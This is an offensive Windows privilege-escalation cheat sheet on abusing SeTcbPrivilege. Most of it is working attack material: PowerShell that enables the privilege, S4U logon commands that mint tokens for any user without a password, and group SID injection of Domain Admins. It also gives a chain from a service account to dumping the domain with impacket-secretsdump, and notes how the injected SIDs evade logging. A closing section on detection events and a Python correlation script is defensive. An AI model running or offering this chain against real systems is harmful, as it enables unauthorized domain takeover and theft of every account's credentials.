Overview
SeTcbPrivilege (“Act as part of the operating system”) grants full trusted access to the LSA: create logon sessions for any user without their password, and inject arbitrary group SIDs into tokens. The LSA treats a holder as equivalent to SYSTEM.
Almost never assigned to non-SYSTEM accounts. When you find it on a service/user account (via GPO/secpol.msc), it is an immediate path to SYSTEM/Domain Admin.
Check if Enabled
```powershell
whoami /priv | findstr /i "SeTcbPrivilege"
```
Shows Disabled? Enable it in the current token at runtime:
```powershell
$code = @"
using System;
using System.Runtime.InteropServices;
public class P {
    [DllImport("advapi32.dll", SetLastError=true)] public static extern bool OpenProcessToken(IntPtr p, uint a, out IntPtr t);
    [DllImport("advapi32.dll", SetLastError=true)] public static extern bool LookupPrivilegeValue(string h, string n, out long l);
    [DllImport("advapi32.dll", SetLastError=true)] public static extern bool AdjustTokenPrivileges(IntPtr t, bool d, ref TP s, int b, IntPtr p, IntPtr r);
    // TOKEN_PRIVILEGES with a single LUID_AND_ATTRIBUTES. Pack=1 is required: without it the
    // long is 8-byte aligned, the struct grows to 24 bytes and the LSA reads the LUID from the wrong offset.
    [StructLayout(LayoutKind.Sequential, Pack=1)] public struct TP { public int Count; public long Luid; public int Attr; }
}
"@
Add-Type $code
# 0x28 = TOKEN_ADJUST_PRIVILEGES (0x20) | TOKEN_QUERY (0x8)
$h=[IntPtr]::Zero; [P]::OpenProcessToken([Diagnostics.Process]::GetCurrentProcess().Handle,0x28,[ref]$h)
$luid=[long]0; [P]::LookupPrivilegeValue($null,"SeTcbPrivilege",[ref]$luid)
# Attr 2 = SE_PRIVILEGE_ENABLED. This only flips a privilege that is already present (Disabled) in the token.
$tp=New-Object P+TP; $tp.Count=1; $tp.Luid=$luid; $tp.Attr=2
[P]::AdjustTokenPrivileges($h,$false,[ref]$tp,0,[IntPtr]::Zero,[IntPtr]::Zero)
# AdjustTokenPrivileges returns $true even when nothing changed; 1300 (ERROR_NOT_ALL_ASSIGNED) means the token never held it
[Runtime.InteropServices.Marshal]::GetLastWin32Error()
```
S4U Logon — Token for Any User, No Password
S4U (Service-for-User) lets a trusted process get a logon token for any user without their password. MSV1_0_S4U_LOGON = local users, KERB_S4U_LOGON = domain users (needs DC reachable). Both require LsaRegisterLogonProcess, gated by SeTcbPrivilege.
NtObjectManager (Easiest)
James Forshaw’s module wraps all the LSA marshaling:
```powershell
Install-Module NtObjectManager -Force
Import-Module NtObjectManager
# Local user
$token = Get-NtToken -S4U -User "Administrator" -Domain $env:COMPUTERNAME
# Domain user
$token = Get-NtToken -S4U -User "domainadmin" -Domain "CORP"
# Inject extra group (e.g. local Administrators)
$sid = Get-NtSid -KnownSid BuiltinAdministrators
$token = Get-NtToken -S4U -User "lowpriv" -Domain $env:COMPUTERNAME -AdditionalGroup $sid
New-Win32Process -Token $token -CommandLine "cmd.exe"
```
| Tool | Use |
|---|---|
| token-priv | Standalone SeTcb exploit binary (full S4U chain) |
| RunasCs | Run as another user, supports S4U |
| SharpToken | C# token manipulation |
Group SID Injection
LsaLogonUser's LocalGroups parameter takes a TOKEN_GROUPS that the LSA adds to the new token without validation, so any SID can be placed in a token. Inject Domain Admins (S-1-5-21-...-512) into a low-priv user's token when an S4U logon for a DA account fails (DC unreachable):
```powershell
$daSid = Get-NtSid -Sddl "S-1-5-21-XXXX-XXXX-XXXX-512"
$token = Get-NtToken -S4U -User $env:USERNAME -Domain $env:COMPUTERNAME -AdditionalGroup $daSid
New-Win32Process -Token $token -CommandLine "cmd.exe"
```
Injected SIDs do NOT appear in the 4624 logon event group list — stealthy. See Detection below.
Practical Chain — Service Account to Domain Admin
Service account with SeTcbPrivilege (vendor required it), not local admin:
```powershell
Import-Module NtObjectManager
$token = Get-NtToken -S4U -User "da_admin" -Domain "CORP" # or SYSTEM / NT AUTHORITY
New-Win32Process -Token $token -CommandLine "cmd.exe"
```
With the DA token, dump the domain:
```bash
impacket-secretsdump corp.local/da_admin@DC01 -just-dc
```
Works even under Credential Guard — S4U is a designed LSA feature, not a memory read.
Combine with Other Privileges
- + SeImpersonatePrivilege: ImpersonateLoggedOnUser the S4U token in the current thread.
- + SeAssignPrimaryTokenPrivilege: CreateProcessAsUser with the token as primary (real process, survives thread death).
- + SeCreateTokenPrivilege: enumerate sessions via LSA, forge an indistinguishable token. See SeCreateTokenPrivilege.
Detection
| Event ID | Indicator |
|---|---|
| 4611 | Trusted logon process registered with LSA. Loudest signal; normally only winlogon.exe at boot |
| 4672 | Special privileges (SeTcb) on new logon |
| 4624 | Logon event; S4U shows as Type 3 (Network) |
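As an added detection example (not part of the original page), the three signals in the table above correlated over constructed sample events. The field names (EventID, LogonProcessName, SubjectUserSid, PrivilegeList, LogonType) are a simplified stand-in for the Security log XML, and the winlogon-only 4611 baseline is an assumption to tune per host:

```python
from typing import Dict, List, Tuple

SYSTEM_SID = "S-1-5-18"
# Assumed baseline (not from the page): the only normal 4611 is winlogon
# registering the "Winlogon" logon process as SYSTEM at boot.
EXPECTED_4611 = {("Winlogon", SYSTEM_SID)}
# Logon process names the OS itself uses for type-3 (network) logons.
BUILTIN_LOGON_PROCS = {"NtLmSsp", "Kerberos", "Negotiate", "Advapi", "User32", "Winlogon"}
Event = Dict[str, object]

def find_setcb_abuse(events: List[Event]) -> List[Tuple[str, Event]]:
    """Correlate 4611 / 4672 / 4624 events into (rule_name, event) findings."""
    findings: List[Tuple[str, Event]] = []
    rogue_procs = set()  # logon process names registered outside the baseline
    for e in events:
        if e["EventID"] == 4611:
            if (e["LogonProcessName"], e["SubjectUserSid"]) not in EXPECTED_4611:
                rogue_procs.add(e["LogonProcessName"])
                findings.append(("unexpected_trusted_logon_process", e))
        elif e["EventID"] == 4672:
            if "SeTcbPrivilege" in e["PrivilegeList"] and e["SubjectUserSid"] != SYSTEM_SID:
                findings.append(("setcb_granted_to_non_system", e))
    # Second pass: 4624s submitted through a rogue logon process. An S4U logon
    # has no credential step, so this 4624 is the only trace of the target
    # account, and injected SIDs never appear in its group list.
    for e in events:
        if e["EventID"] != 4624:
            continue
        if e["LogonProcessName"] in rogue_procs:
            findings.append(("logon_via_unexpected_logon_process", e))
        elif e["LogonType"] == 3 and e["LogonProcessName"] not in BUILTIN_LOGON_PROCS:
            # covers the case where the matching 4611 already rolled out of the log
            findings.append(("type3_logon_via_unknown_logon_process", e))
    return findings

# Constructed sample events with simplified field names (not real log output).
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 4611, "LogonProcessName": "Winlogon", "SubjectUserSid": SYSTEM_SID},
    {"EventID": 4611, "LogonProcessName": "S4UTool", "SubjectUserSid": "S-1-5-21-1-2-3-1105"},
    {"EventID": 4672, "SubjectUserSid": SYSTEM_SID, "SubjectLogonId": "0x3e7",
     "PrivilegeList": ["SeTcbPrivilege", "SeDebugPrivilege"]},
    {"EventID": 4672, "SubjectUserSid": "S-1-5-21-1-2-3-1105", "SubjectLogonId": "0x4f2a1",
     "PrivilegeList": ["SeTcbPrivilege"]},
    {"EventID": 4624, "LogonType": 3, "LogonProcessName": "S4UTool",
     "TargetUserName": "da_admin", "TargetLogonId": "0x5b0c7"},
    {"EventID": 4624, "LogonType": 3, "LogonProcessName": "NtLmSsp",
     "TargetUserName": "backup_svc", "TargetLogonId": "0x5b1f0"},
]
```

Running `find_setcb_abuse(SAMPLE_EVENTS)` yields three findings: the non-winlogon 4611, the non-SYSTEM 4672 carrying SeTcbPrivilege, and the 4624 for da_admin submitted through that registered logon process; the ordinary NtLmSsp network logon is not flagged.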
Quick Reference
| Technique | Result |
|---|---|
| S4U logon (NtObjectManager) | Token for any local/domain user |
| Group SID injection | Arbitrary group membership (e.g. Domain Admins) |
| token-priv toolset | Standalone binary, no deps |
| + SeImpersonate / SeAssignPrimaryToken | Impersonate / spawn as the token |